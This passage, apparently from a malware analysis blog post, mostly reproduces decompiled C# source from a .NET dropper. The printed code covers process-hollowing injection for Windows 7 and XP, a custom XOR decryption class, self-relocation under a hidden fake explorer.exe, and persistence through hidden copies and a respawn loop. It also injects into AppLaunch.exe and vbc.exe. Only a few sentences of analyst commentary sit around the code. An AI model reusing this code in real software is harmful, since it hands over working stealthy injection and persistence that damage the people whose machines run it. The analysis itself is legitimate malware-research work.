arg_150_1 = (IntPtr)((long<\/span>)((ulong<\/span>)context.Ebx + 8<\/span>uL));\r\n\t\t\tlong<\/span> num2;\r\n\t\t\tintPtr = (IntPtr)num2;\r\n\t\t\tIntPtr arg_150_3 = (IntPtr)4<\/span>;\r\n\t\t\tint<\/span> num3 = 0<\/span>;\r\n\t\t\tint<\/span> arg_15E_0 = RuntimePortableExecutable.ReadProcessMemory(arg_150_0, arg_150_1, ref<\/span> intPtr, arg_150_3, ref<\/span> num3);\r\n\t\t\tnum2 = (long<\/span>)intPtr;\r\n\t\t\tif<\/span> (arg_163_0 & arg_15E_0 >= 0<\/span> & RuntimePortableExecutable.ZwUnmapViewOfSection(processInformation.Process, (IntPtr)num2) >= 0L<\/span>)\r\n\t\t\t{\r\n\t\t\t\tuint<\/span> num4 = (uint<\/span>)((int<\/span>)RuntimePortableExecutable.VirtualAllocEx(processInformation.Process, (IntPtr)((long<\/span>)((ulong<\/span>)ntHeaders.Optional.Image)), ntHeaders.Optional.SImage, 12288<\/span>u, 4<\/span>u));\r\n\t\t\t\tif<\/span> ((ulong<\/span>)num4 != 0<\/span>uL)\r\n\t\t\t\t{\r\n\t\t\t\t\tIntPtr arg_1EC_0 = processInformation.Process;\r\n\t\t\t\t\tIntPtr arg_1EC_1 = (IntPtr)((long<\/span>)((ulong<\/span>)num4));\r\n\t\t\t\t\tIntPtr arg_1EC_3 = (IntPtr)((long<\/span>)((ulong<\/span>)ntHeaders.Optional.SHeaders));\r\n\t\t\t\t\tuint<\/span> num5;\r\n\t\t\t\t\tnum3 = (int<\/span>)num5;\r\n\t\t\t\t\tRuntimePortableExecutable.WriteProcessMemory(arg_1EC_0, arg_1EC_1, data, arg_1EC_3, out<\/span> num3);\r\n\t\t\t\t\tnum5 = (uint<\/span>)num3;\r\n\t\t\t\t\tlong<\/span> num6 = (long<\/span>)(dosHeader.Address + 248<\/span>);\r\n\t\t\t\t\tint<\/span> arg_217_0 = 0<\/span>;\r\n\t\t\t\t\tint<\/span> num7 = (int<\/span>)(ntHeaders.File.Sections - 1<\/span>);\r\n\t\t\t\t\tfor<\/span> (int<\/span> i = arg_217_0; i <= num7; i++)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tintPtr = new<\/span> IntPtr((long<\/span>)num + num6 + (long<\/span>)(i * 40<\/span>));\r\n\t\t\t\t\t\tRuntimePortableExecutable.SectionHeader sectionHeader;\r\n\t\t\t\t\t\tobject<\/span> expr_244 = Marshal.PtrToStructure(intPtr, sectionHeader.GetType());\r\n\t\t\t\t\t\tRuntimePortableExecutable.SectionHeader sectionHeader2;\r\n\t\t\t\t\t\tsectionHeader = ((expr_244 != null<\/span>) ? ((RuntimePortableExecutable.SectionHeader)expr_244) : sectionHeader2);\r\n\t\t\t\t\t\tbyte<\/span>[] array = new<\/span> byte<\/span>[sectionHeader.Size + 1<\/span>u];\r\n\t\t\t\t\t\tint<\/span> arg_277_0 = 0<\/span>;\r\n\t\t\t\t\t\tint<\/span> num8 = (int<\/span>)((ulong<\/span>)sectionHeader.Size - 1<\/span>uL);\r\n\t\t\t\t\t\tfor<\/span> (int<\/span> j = arg_277_0; j <= num8; j++)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tarray[j] = data[(int<\/span>)((ulong<\/span>)sectionHeader.Pointer + (ulong<\/span>)((long<\/span>)j))];\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\tIntPtr arg_2C7_0 = processInformation.Process;\r\n\t\t\t\t\t\tIntPtr arg_2C7_1 = (IntPtr)((long<\/span>)((ulong<\/span>)(num4 + sectionHeader.Address)));\r\n\t\t\t\t\t\tbyte<\/span>[] arg_2C7_2 = array;\r\n\t\t\t\t\t\tIntPtr arg_2C7_3 = (IntPtr)((long<\/span>)((ulong<\/span>)sectionHeader.Size));\r\n\t\t\t\t\t\tnum3 = (int<\/span>)num5;\r\n\t\t\t\t\t\tRuntimePortableExecutable.WriteProcessMemory(arg_2C7_0, arg_2C7_1, arg_2C7_2, arg_2C7_3, out<\/span> num3);\r\n\t\t\t\t\t\tnum5 = (uint<\/span>)num3;\r\n\t\t\t\t\t\tRuntimePortableExecutable.VirtualProtectEx(processInformation.Process, (IntPtr)((long<\/span>)((ulong<\/span>)(num4 + sectionHeader.Address))), (UIntPtr)sectionHeader.Misc.Size, (UIntPtr)((ulong<\/span>)RuntimePortableExecutable.Protect((long<\/span>)((ulong<\/span>)sectionHeader.Flags))), (uint<\/span>)num2);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tbyte<\/span>[] bytes = BitConverter.GetBytes(num4);\r\n\t\t\t\t\tIntPtr arg_350_0 = processInformation.Process;\r\n\t\t\t\t\tIntPtr arg_350_1 = (IntPtr)((long<\/span>)((ulong<\/span>)context.Ebx + 8<\/span>uL));\r\n\t\t\t\t\tbyte<\/span>[] arg_350_2 = bytes;\r\n\t\t\t\t\tIntPtr arg_350_3 = (IntPtr)4<\/span>;\r\n\t\t\t\t\tnum3 = (int<\/span>)num5;\r\n\t\t\t\t\tRuntimePortableExecutable.WriteProcessMemory(arg_350_0, arg_350_1, arg_350_2, arg_350_3, out<\/span> num3);\r\n\t\t\t\t\tnum5 = (uint<\/span>)num3;\r\n\t\t\t\t\tcontext.Eax = num4 + ntHeaders.Optional.Address;\r\n\t\t\t\t\tRuntimePortableExecutable.SetThreadContext(processInformation.Thread, ref<\/span> context);\r\n\t\t\t\t\tRuntimePortableExecutable.ResumeThread(processInformation.Thread);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n<\/pre>\n<\/div>\n
Win7<\/p>\n
\n
public<\/span> static<\/span> void<\/span> Windows7<\/span>(byte<\/span>[] data, string<\/span> target)\r\n\t\t{\r\n\t\t\tRuntimePortableExecutable.Context context = default<\/span>(RuntimePortableExecutable.Context);\r\n\t\t\tRuntimePortableExecutable.ProcessInformation processInformation = default<\/span>(RuntimePortableExecutable.ProcessInformation);\r\n\t\t\tRuntimePortableExecutable.StartupInformation startupInformation = default<\/span>(RuntimePortableExecutable.StartupInformation);\r\n\t\t\tRuntimePortableExecutable.SecurityFlags securityFlags = default<\/span>(RuntimePortableExecutable.SecurityFlags);\r\n\t\t\tRuntimePortableExecutable.SecurityFlags securityFlags2 = default<\/span>(RuntimePortableExecutable.SecurityFlags);\r\n\t\t\tGCHandle gCHandle = GCHandle.Alloc(data, GCHandleType.Pinned);\r\n\t\t\tIntPtr ptr = gCHandle.AddrOfPinnedObject();\r\n\t\t\tint<\/span> num = ptr.ToInt32();\r\n\t\t\tRuntimePortableExecutable.DosHeader dosHeader;\r\n\t\t\tobject<\/span> expr_58 = Marshal.PtrToStructure(gCHandle.AddrOfPinnedObject(), dosHeader.GetType());\r\n\t\t\tRuntimePortableExecutable.DosHeader dosHeader2;\r\n\t\t\tdosHeader = ((expr_58 != null<\/span>) ? ((RuntimePortableExecutable.DosHeader)expr_58) : dosHeader2);\r\n\t\t\tgCHandle.Free();\r\n\t\t\tstring<\/span> text = null<\/span>;\r\n\t\t\tbool<\/span> arg_8A_4 = false<\/span>;\r\n\t\t\tuint<\/span> arg_8A_5 = 4<\/span>u;\r\n\t\t\tIntPtr intPtr;\r\n\t\t\tIntPtr arg_8A_6 = intPtr;\r\n\t\t\tstring<\/span> text2 = null<\/span>;\r\n\t\t\tif<\/span> (!(-(RuntimePortableExecutable.CreateProcess(ref<\/span> text, ref<\/span> target, ref<\/span> securityFlags, ref<\/span> securityFlags2, arg_8A_4, arg_8A_5, arg_8A_6, ref<\/span> text2, ref<\/span> startupInformation, out<\/span> processInformation) > false<\/span>)))\r\n\t\t\t{\r\n\t\t\t\treturn<\/span>;\r\n\t\t\t}\r\n\t\t\tptr = new<\/span> IntPtr(num + dosHeader.Address);\r\n\t\t\tRuntimePortableExecutable.NtHeaders ntHeaders;\r\n\t\t\tobject<\/span> expr_BA = Marshal.PtrToStructure(ptr, ntHeaders.GetType());\r\n\t\t\tRuntimePortableExecutable.NtHeaders ntHeaders2;\r\n\t\t\tntHeaders = ((expr_BA != null<\/span>) ? ((RuntimePortableExecutable.NtHeaders)expr_BA) : ntHeaders2);\r\n\t\t\tstartupInformation.CB = Strings.Len(startupInformation);\r\n\t\t\tcontext.Flags = 65538<\/span>u;\r\n\t\t\tif<\/span> ((ulong<\/span>)ntHeaders.Signature != 17744<\/span>uL | dosHeader.Magic != 23117<\/span>)\r\n\t\t\t{\r\n\t\t\t\treturn<\/span>;\r\n\t\t\t}\r\n\t\t\tbool<\/span> arg_15A_0 = RuntimePortableExecutable.GetThreadContext(processInformation.Thread, ref<\/span> context);\r\n\t\t\tIntPtr arg_14F_0 = processInformation.Process;\r\n\t\t\tIntPtr arg_14F_1 = (IntPtr)((long<\/span>)((ulong<\/span>)context.Ebx + 8<\/span>uL));\r\n\t\t\tptr = (IntPtr)0<\/span>;\r\n\t\t\tIntPtr arg_14F_3 = (IntPtr)4<\/span>;\r\n\t\t\tint<\/span> num2 = 0<\/span>;\r\n\t\t\tif<\/span> (arg_15A_0 & RuntimePortableExecutable.ReadProcessMemory(arg_14F_0, arg_14F_1, ref<\/span> ptr, arg_14F_3, ref<\/span> num2) >= 0<\/span> & RuntimePortableExecutable.ZwUnmapViewOfSection(processInformation.Process, (IntPtr)0<\/span>) >= 0L<\/span>)\r\n\t\t\t{\r\n\t\t\t\tuint<\/span> num3 = (uint<\/span>)((int<\/span>)RuntimePortableExecutable.VirtualAllocEx(processInformation.Process, (IntPtr)((long<\/span>)((ulong<\/span>)ntHeaders.Optional.Image)), ntHeaders.Optional.SImage, 12288<\/span>u, 4<\/span>u));\r\n\t\t\t\tif<\/span> ((ulong<\/span>)num3 != 0<\/span>uL)\r\n\t\t\t\t{\r\n\t\t\t\t\tIntPtr arg_1E3_0 = processInformation.Process;\r\n\t\t\t\t\tIntPtr arg_1E3_1 = (IntPtr)((long<\/span>)((ulong<\/span>)num3));\r\n\t\t\t\t\tIntPtr arg_1E3_3 = (IntPtr)((long<\/span>)((ulong<\/span>)ntHeaders.Optional.SHeaders));\r\n\t\t\t\t\tuint<\/span> num4;\r\n\t\t\t\t\tnum2 = (int<\/span>)num4;\r\n\t\t\t\t\tRuntimePortableExecutable.WriteProcessMemory(arg_1E3_0, arg_1E3_1, data, arg_1E3_3, out<\/span> num2);\r\n\t\t\t\t\tnum4 = (uint<\/span>)num2;\r\n\t\t\t\t\tlong<\/span> num5 = (long<\/span>)(dosHeader.Address + 248<\/span>);\r\n\t\t\t\t\tint<\/span> arg_20E_0 = 0<\/span>;\r\n\t\t\t\t\tint<\/span> num6 = (int<\/span>)(ntHeaders.File.Sections - 1<\/span>);\r\n\t\t\t\t\tfor<\/span> (int<\/span> i = arg_20E_0; i <= num6; i++)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tptr = new<\/span> IntPtr((long<\/span>)num + num5 + (long<\/span>)(i * 40<\/span>));\r\n\t\t\t\t\t\tRuntimePortableExecutable.SectionHeader sectionHeader;\r\n\t\t\t\t\t\tobject<\/span> expr_23B = Marshal.PtrToStructure(ptr, sectionHeader.GetType());\r\n\t\t\t\t\t\tRuntimePortableExecutable.SectionHeader sectionHeader2;\r\n\t\t\t\t\t\tsectionHeader = ((expr_23B != null<\/span>) ? ((RuntimePortableExecutable.SectionHeader)expr_23B) : sectionHeader2);\r\n\t\t\t\t\t\tbyte<\/span>[] array = new<\/span> byte<\/span>[sectionHeader.Size + 1<\/span>u];\r\n\t\t\t\t\t\tint<\/span> arg_26E_0 = 0<\/span>;\r\n\t\t\t\t\t\tint<\/span> num7 = (int<\/span>)((ulong<\/span>)sectionHeader.Size - 1<\/span>uL);\r\n\t\t\t\t\t\tfor<\/span> (int<\/span> j = arg_26E_0; j <= num7; j++)\r\n\t\t\t\t\t\t{\r\n\t\t\t\t\t\t\tarray[j] = data[(int<\/span>)((ulong<\/span>)sectionHeader.Pointer + (ulong<\/span>)((long<\/span>)j))];\r\n\t\t\t\t\t\t}\r\n\t\t\t\t\t\tIntPtr arg_2BE_0 = processInformation.Process;\r\n\t\t\t\t\t\tIntPtr arg_2BE_1 = (IntPtr)((long<\/span>)((ulong<\/span>)(num3 + sectionHeader.Address)));\r\n\t\t\t\t\t\tbyte<\/span>[] arg_2BE_2 = array;\r\n\t\t\t\t\t\tIntPtr arg_2BE_3 = (IntPtr)((long<\/span>)((ulong<\/span>)sectionHeader.Size));\r\n\t\t\t\t\t\tnum2 = (int<\/span>)num4;\r\n\t\t\t\t\t\tRuntimePortableExecutable.WriteProcessMemory(arg_2BE_0, arg_2BE_1, arg_2BE_2, arg_2BE_3, out<\/span> num2);\r\n\t\t\t\t\t\tnum4 = (uint<\/span>)num2;\r\n\t\t\t\t\t\tRuntimePortableExecutable.VirtualProtectEx(processInformation.Process, (IntPtr)((long<\/span>)((ulong<\/span>)(num3 + sectionHeader.Address))), (UIntPtr)sectionHeader.Misc.Size, (UIntPtr)((ulong<\/span>)RuntimePortableExecutable.Protect((long<\/span>)((ulong<\/span>)sectionHeader.Flags))), 0<\/span>u);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tbyte<\/span>[] bytes = BitConverter.GetBytes(num3);\r\n\t\t\t\t\tIntPtr arg_346_0 = processInformation.Process;\r\n\t\t\t\t\tIntPtr arg_346_1 = (IntPtr)((long<\/span>)((ulong<\/span>)context.Ebx + 8<\/span>uL));\r\n\t\t\t\t\tbyte<\/span>[] arg_346_2 = bytes;\r\n\t\t\t\t\tIntPtr arg_346_3 = (IntPtr)4<\/span>;\r\n\t\t\t\t\tnum2 = (int<\/span>)num4;\r\n\t\t\t\t\tRuntimePortableExecutable.WriteProcessMemory(arg_346_0, arg_346_1, arg_346_2, arg_346_3, out<\/span> num2);\r\n\t\t\t\t\tnum4 = (uint<\/span>)num2;\r\n\t\t\t\t\tcontext.Eax = num3 + ntHeaders.Optional.Address;\r\n\t\t\t\t\tRuntimePortableExecutable.SetThreadContext(processInformation.Thread, ref<\/span> context);\r\n\t\t\t\t\tRuntimePortableExecutable.ResumeThread(processInformation.Thread);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\r\n<\/pre>\n<\/div>\n
The ‘ue4tretr’ class is the most interesting. The ‘ThirdXorr’ method is, as you would probably guess, a class devoted to decryption of a bytestream passed to it. Code time:<\/p>\n
\n
using<\/span> System<\/span>;\r\nusing<\/span> System.Text<\/span>;\r\nnamespace<\/span> Project1<\/span>\r\n{\r\n\tpublic<\/span> class<\/span> ThirdXorr<\/span>\r\n\t{\r\n\t\tprivate<\/span> string<\/span> _defKey;\r\n\t\tpublic<\/span> string<\/span> Key\r\n\t\t{\r\n\t\t\tget<\/span>\r\n\t\t\t{\r\n\t\t\t\treturn<\/span> this<\/span>._defKey;\r\n\t\t\t}\r\n\t\t\tset<\/span>\r\n\t\t\t{\r\n\t\t\t\tthis<\/span>._defKey = value<\/span>;\r\n\t\t\t}\r\n\t\t}\r\n\t\tpublic<\/span> ThirdXorr<\/span>(string<\/span> Key)\r\n\t\t{\r\n\t\t\tthis<\/span>._defKey = ""<\/span>;\r\n\t\t\tthis<\/span>.Key = Key;\r\n\t\t}\r\n\t\tpublic<\/span> ThirdXorr<\/span>()\r\n\t\t{\r\n\t\t\tthis<\/span>._defKey = ""<\/span>;\r\n\t\t\tthis<\/span>.Key = ""<\/span>;\r\n\t\t}\r\n\t\tpublic<\/span> string<\/span> PolyCrypt<\/span>(string<\/span> data)\r\n\t\t{\r\n\t\t\treturn<\/span> Encoding.Default.GetString(this<\/span>.PolyCrypt(Encoding.Default.GetBytes(data)));\r\n\t\t}\r\n\t\tpublic<\/span> string<\/span> PolyDeCrypt<\/span>(string<\/span> data)\r\n\t\t{\r\n\t\t\treturn<\/span> Encoding.Default.GetString(this<\/span>.PolyDeCrypt(Encoding.Default.GetBytes(data)));\r\n\t\t}\r\n\t\tpublic<\/span> byte<\/span>[] PolyCrypt<\/span>(byte<\/span>[] data)\r\n\t\t{\r\n\t\t\tbyte<\/span>[] array = new<\/span> byte<\/span>[data.Length + 1<\/span>];\r\n\t\t\tarray[0<\/span>] = Convert.ToByte(new<\/span> Random().Next(1<\/span>, 255<\/span>));\r\n\t\t\tint<\/span> arg_2A_0 = 0<\/span>;\r\n\t\t\tint<\/span> num = data.Length - 1<\/span>;\r\n\t\t\tfor<\/span> (int<\/span> i = arg_2A_0; i <= num; i++)\r\n\t\t\t{\r\n\t\t\t\tarray[i + 1<\/span>] = ThirdXorr.ModuloByte(array[i], (short<\/span>)data[i]);\r\n\t\t\t}\r\n\t\t\treturn<\/span> ThirdXorr.XorCrypt(array, Encoding.Default.GetBytes(this<\/span>.Key));\r\n\t\t}\r\n\t\tpublic<\/span> byte<\/span>[] PolyDeCrypt<\/span>(byte<\/span>[] data)\r\n\t\t{\r\n\t\t\tdata = ThirdXorr.XorCrypt(data, Encoding.Default.GetBytes(this<\/span>.Key));\r\n\t\t\tbyte<\/span>[] array = new<\/span> byte<\/span>[data.Length - 2<\/span> + 1<\/span>];\r\n\t\t\tfor<\/span> (int<\/span> i = data.Length - 1<\/span>; i >= 1<\/span>; i += -1<\/span>)\r\n\t\t\t{\r\n\t\t\t\tarray[i - 1<\/span>] = ThirdXorr.ModuloByte(data[i], (short<\/span>)(-(short<\/span>)data[i - 1<\/span>]));\r\n\t\t\t}\r\n\t\t\treturn<\/span> array;\r\n\t\t}\r\n\t\tprivate<\/span> static<\/span> byte<\/span> ModuloByte<\/span>(byte<\/span> myByte, short<\/span> addition)\r\n\t\t{\r\n\t\t\twhile<\/span> (addition < 0<\/span>)\r\n\t\t\t{\r\n\t\t\t\taddition += 256<\/span>;\r\n\t\t\t}\r\n\t\t\treturn<\/span> Convert.ToByte((int<\/span>)(((short<\/span>)myByte + addition) % 256<\/span>));\r\n\t\t}\r\n\t\tprivate<\/span> static<\/span> byte<\/span>[] XorCrypt<\/span>(byte<\/span>[] data, byte<\/span>[] Key)\r\n\t\t{\r\n\t\t\tif<\/span> (Key.Length != 0<\/span>)\r\n\t\t\t{\r\n\t\t\t\tint<\/span> arg_0D_0 = 0<\/span>;\r\n\t\t\t\tint<\/span> num = data.Length - 1<\/span>;\r\n\t\t\t\tfor<\/span> (int<\/span> i = arg_0D_0; i <= num; i++)\r\n\t\t\t\t{\r\n\t\t\t\t\tdata[i] = (data[i] ^ ThirdXorr.ModuloByte(Key[i % Key.Length], (short<\/span>)Key[(int<\/span>)Key[i % Key.Length] % Key.Length]) ^ Key[(i + i % 7<\/span>) % Key.Length % Key.Length]);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\treturn<\/span> data;\r\n\t\t}\r\n\t\tpublic<\/span> string<\/span> XorCrypt<\/span>(string<\/span> data)\r\n\t\t{\r\n\t\t\treturn<\/span> this<\/span>.XorCrypt(data, null<\/span>);\r\n\t\t}\r\n\t\tpublic<\/span> string<\/span> XorCrypt<\/span>(string<\/span> data, string<\/span> Key)\r\n\t\t{\r\n\t\t\treturn<\/span> Encoding.Default.GetString(ThirdXorr.XorCrypt(Encoding.Default.GetBytes(data), Encoding.Default.GetBytes(Key)));\r\n\t\t}\r\n\t}\r\n}\r\n<\/pre>\n<\/div>\n
The ‘ue4tretr’ class is the main class and the real meat and potatoes of the malware binary. It contains multiple interesting methods for injection, persistance, and all of the IOC goodies us malware analysts like to flag. Observe:<\/p>\n
\n
using<\/span> Microsoft.VisualBasic<\/span>;\r\nusing<\/span> Microsoft.VisualBasic.CompilerServices<\/span>;\r\nusing<\/span> Project1.My.Resources<\/span>;\r\nusing<\/span> System<\/span>;\r\nusing<\/span> System.Collections.Generic<\/span>;\r\nusing<\/span> System.Diagnostics<\/span>;\r\nusing<\/span> System.Globalization<\/span>;\r\nusing<\/span> System.IO<\/span>;\r\nusing<\/span> System.Runtime.CompilerServices<\/span>;\r\nusing<\/span> System.Security.Cryptography<\/span>;\r\nusing<\/span> System.Text<\/span>;\r\nusing<\/span> System.Threading<\/span>;\r\nnamespace<\/span> Project1<\/span>\r\n{\r\n\t[StandardModule]<\/span>\r\n\tinternal<\/span> sealed<\/span> class<\/span> ue4tretr<\/span>\r\n\t{\r\n\t\tprivate<\/span> static<\/span> string<\/span> Spy = "ofemeiecumestitu"<\/span>;\r\n\t\tprivate<\/span> static<\/span> string<\/span> _fa1;\r\n\t\tprivate<\/span> static<\/span> string<\/span> _fa2;\r\n\t\tprivate<\/span> static<\/span> string<\/span> _fa3;\r\n\t\tprivate<\/span> static<\/span> string<\/span> _fa4;\r\n\t\tprivate<\/span> static<\/span> string<\/span> _fa5;\r\n\t\tprivate<\/span> static<\/span> byte<\/span>[] _byteArray;\r\n\t\tprivate<\/span> static<\/span> SymmetricAlgorithm _algorithm = new<\/span> RijndaelManaged();\r\n\t\t[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]<\/span>\r\n\t\tpublic<\/span> static<\/span> void<\/span> tuy5u6ruy<\/span>()\r\n\t\t{\r\n\t\t\tFileSystem.FileOpen(1<\/span>, Process.GetCurrentProcess().MainModule.FileName, OpenMode.Binary, OpenAccess.Read, OpenShare.Shared, -1<\/span>);\r\n\t\t\tstring<\/span> expression = Strings.Space((int<\/span>)FileSystem.LOF(1<\/span>));\r\n\t\t\tFileSystem.FileGet(1<\/span>, ref<\/span> expression, -1L<\/span>, false<\/span>);\r\n\t\t\tFileSystem.FileClose(new<\/span> int<\/span>[]\r\n\t\t\t{\r\n\t\t\t\t1<\/span>\r\n\t\t\t});\r\n\t\t\tstring<\/span>[] array = Strings.Split(expression, ue4tretr.Spy, -1<\/span>, CompareMethod.Binary);\r\n\t\t\tThirdXorr thirdXorr = new<\/span> ThirdXorr(array[2<\/span>]);\r\n\t\t\tstring<\/span> s = thirdXorr.PolyDeCrypt(array[1<\/span>]);\r\n\t\t\tue4tretr._fa1 = array[3<\/span>];\r\n\t\t\tue4tretr._fa2 = array[4<\/span>];\r\n\t\t\tue4tretr._fa3 = array[5<\/span>];\r\n\t\t\tue4tretr._fa4 = array[6<\/span>];\r\n\t\t\tue4tretr._fa5 = array[7<\/span>];\r\n\t\t\tif<\/span> (Operators.CompareString(ue4tretr._fa1, true<\/span>.ToString(CultureInfo.InvariantCulture), false<\/span>) == 0<\/span>)\r\n\t\t\t{\r\n\t\t\t\tue4tretr.Melt();\r\n\t\t\t}\r\n\t\t\tif<\/span> (Operators.CompareString(ue4tretr._fa2, true<\/span>.ToString(CultureInfo.InvariantCulture), false<\/span>) == 0<\/span>)\r\n\t\t\t{\r\n\t\t\t\tue4tretr.Startup();\r\n\t\t\t}\r\n\t\t\tue4tretr._byteArray = Encoding.Default.GetBytes(s);\r\n\t\t\tif<\/span> (Operators.CompareString(ue4tretr._fa3, true<\/span>.ToString(CultureInfo.InvariantCulture), false<\/span>) == 0<\/span>)\r\n\t\t\t{\r\n\t\t\t\tue4tretr.Injection();\r\n\t\t\t}\r\n\t\t\tif<\/span> (Operators.CompareString(ue4tretr._fa4, true<\/span>.ToString(CultureInfo.InvariantCulture), false<\/span>) == 0<\/span>)\r\n\t\t\t{\r\n\t\t\t\tue4tretr.AppLaunch();\r\n\t\t\t}\r\n\t\t\tif<\/span> (Operators.CompareString(ue4tretr._fa5, true<\/span>.ToString(CultureInfo.InvariantCulture), false<\/span>) == 0<\/span>)\r\n\t\t\t{\r\n\t\t\t\tue4tretr.Vbc();\r\n\t\t\t}\r\n\t\t\tif<\/span> (Operators.CompareString(ue4tretr._fa2, true<\/span>.ToString(CultureInfo.InvariantCulture), false<\/span>) == 0<\/span>)\r\n\t\t\t{\r\n\t\t\t\tue4tretr.FilePersistece();\r\n\t\t\t}\r\n\t\t\tProjectData.EndApp();\r\n\t\t}\r\n\t\t[MethodImpl(MethodImplOptions.NoInlining | MethodImplOptions.NoOptimization)]<\/span>\r\n\t\tpublic<\/span> static<\/span> void<\/span> Melt<\/span>()\r\n\t\t{\r\n\t\t\ttry<\/span>\r\n\t\t\t{\r\n\t\t\t\tstring<\/span> fileName = Process.GetCurrentProcess().MainModule.FileName;\r\n\t\t\t\tstring<\/span> text = Environment.GetFolderPath(Environment.SpecialFolder.Templates) + "\\\\explorer.exe"<\/span>;\r\n\t\t\t\tFile.Delete(text);\r\n\t\t\t\tFile.Move(fileName, text);\r\n\t\t\t\tProcess.Start(text);\r\n\t\t\t\tFile.SetAttributes(text, FileAttributes.Hidden);\r\n\t\t\t\tProjectData.EndApp();\r\n\t\t\t}\r\n\t\t\tcatch<\/span> (Exception expr_44)\r\n\t\t\t{\r\n\t\t\t\tProjectData.SetProjectError(expr_44);\r\n\t\t\t\tProjectData.ClearProjectError();\r\n\t\t\t}\r\n\t\t}\r\n\t\tpublic<\/span> static<\/span> void<\/span> Startup<\/span>()\r\n\t\t{\r\n\t\t\ttry<\/span>\r\n\t\t\t{\r\n\t\t\t\tFile.Copy(Process.GetCurrentProcess().MainModule.FileName, Path.GetTempPath() + "\\\\sppnp.exe"<\/span>);\r\n\t\t\t\tif<\/span> (!File.Exists(Environment.GetFolderPath(Environment.SpecialFolder.Templates) + "\\\\THEMECPL.exe"<\/span>))\r\n\t\t\t\t{\r\n\t\t\t\t\ttry<\/span>\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tFile.WriteAllBytes(Environment.GetFolderPath(Environment.SpecialFolder.Templates) + "\\\\THEMECPL.exe"<\/span>, Resources.Project1);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tcatch<\/span> (Exception arg_58_0)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tProjectData.SetProjectError(arg_58_0);\r\n\t\t\t\t\t\tProjectData.ClearProjectError();\r\n\t\t\t\t\t}\r\n\t\t\t\t\tFile.SetAttributes(Path.GetTempPath() + "\\\\sppnp.exe"<\/span>, FileAttributes.ReadOnly | FileAttributes.Hidden | FileAttributes.System | FileAttributes.NotContentIndexed);\r\n\t\t\t\t\tFile.SetAttributes(Environment.GetFolderPath(Environment.SpecialFolder.Templates) + "\\\\THEMECPL.exe"<\/span>, FileAttributes.ReadOnly | FileAttributes.Hidden | FileAttributes.NotContentIndexed);\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t\tcatch<\/span> (Exception arg_9A_0)\r\n\t\t\t{\r\n\t\t\t\tProjectData.SetProjectError(arg_9A_0);\r\n\t\t\t\tProjectData.ClearProjectError();\r\n\t\t\t}\r\n\t\t}\r\n\t\tpublic<\/span> static<\/span> void<\/span> FilePersistece<\/span>()\r\n\t\t{\r\n\t\t\tList<string<\/span>> list = new<\/span> List<string<\/span>>();\r\n\t\t\twhile<\/span> (true<\/span>)\r\n\t\t\t{\r\n\t\t\t\ttry<\/span>\r\n\t\t\t\t{\r\n\t\t\t\t\tProcess[] processes = Process.GetProcesses();\r\n\t\t\t\t\tfor<\/span> (int<\/span> i = 0<\/span>; i < processes.Length; i++)\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tProcess process = processes[i];\r\n\t\t\t\t\t\tlist.Add(process.ProcessName);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tif<\/span> (!list.Contains("THEMECPL"<\/span>))\r\n\t\t\t\t\t{\r\n\t\t\t\t\t\tProcess.Start(Environment.GetFolderPath(Environment.SpecialFolder.Templates) + "\\\\THEMECPL.exe"<\/span>);\r\n\t\t\t\t\t}\r\n\t\t\t\t\tlist.Clear();\r\n\t\t\t\t\tThread.Sleep(100<\/span>);\r\n\t\t\t\t}\r\n\t\t\t\tcatch<\/span> (Exception arg_5D_0)\r\n\t\t\t\t{\r\n\t\t\t\t\tProjectData.SetProjectError(arg_5D_0);\r\n\t\t\t\t\tProjectData.ClearProjectError();\r\n\t\t\t\t}\r\n\t\t\t}\r\n\t\t}\r\n\t\tpublic<\/span> static<\/span> void<\/span> Injection<\/span>()\r\n\t\t{\r\n\t\t\tif<\/span> (Environment.OSVersion.Version.Major >= 6<\/span>)\r\n\t\t\t{\r\n\t\t\t\tRuntimePortableExecutable.Windows7(ue4tretr._byteArray, Process.GetCurrentProcess().MainModule.FileName);\r\n\t\t\t}\r\n\t\t\telse<\/span>\r\n\t\t\t{\r\n\t\t\t\tRuntimePortableExecutable.WindowsXp(ue4tretr._byteArray, Process.GetCurrentProcess().MainModule.FileName);\r\n\t\t\t}\r\n\t\t}\r\n\t\tpublic<\/span> static<\/span> void<\/span> AppLaunch<\/span>()\r\n\t\t{\r\n\t\t\tif<\/span> (Environment.OSVersion.Version.Major >= 6<\/span>)\r\n\t\t\t{\r\n\t\t\t\tRuntimePortableExecutable.Windows7(ue4tretr._byteArray, Interaction.Environ("Windir"<\/span>) + "\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\AppLaunch.exe"<\/span>);\r\n\t\t\t}\r\n\t\t\telse<\/span>\r\n\t\t\t{\r\n\t\t\t\tRuntimePortableExecutable.WindowsXp(ue4tretr._byteArray, Interaction.Environ("Windir"<\/span>) + "\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\AppLaunch.exe"<\/span>);\r\n\t\t\t}\r\n\t\t}\r\n\t\tpublic<\/span> static<\/span> void<\/span> Vbc<\/span>()\r\n\t\t{\r\n\t\t\tif<\/span> (Environment.OSVersion.Version.Major >= 6<\/span>)\r\n\t\t\t{\r\n\t\t\t\tRuntimePortableExecutable.Windows7(ue4tretr._byteArray, Interaction.Environ("Windir"<\/span>) + "\\\\Microsoft.NET\\\\Framework\\\\v2.0.50727\\\\vbc.exe"<\/span>);\r\n\t\t\t}\r\n\t\t\telse<\/span>\r\n\t\t\t{\r\n\t\t\t\tRuntimePortableExecutable.WindowsXp(ue4tretr._byteArray, Interaction.Environ("Windir"<\/span>) + 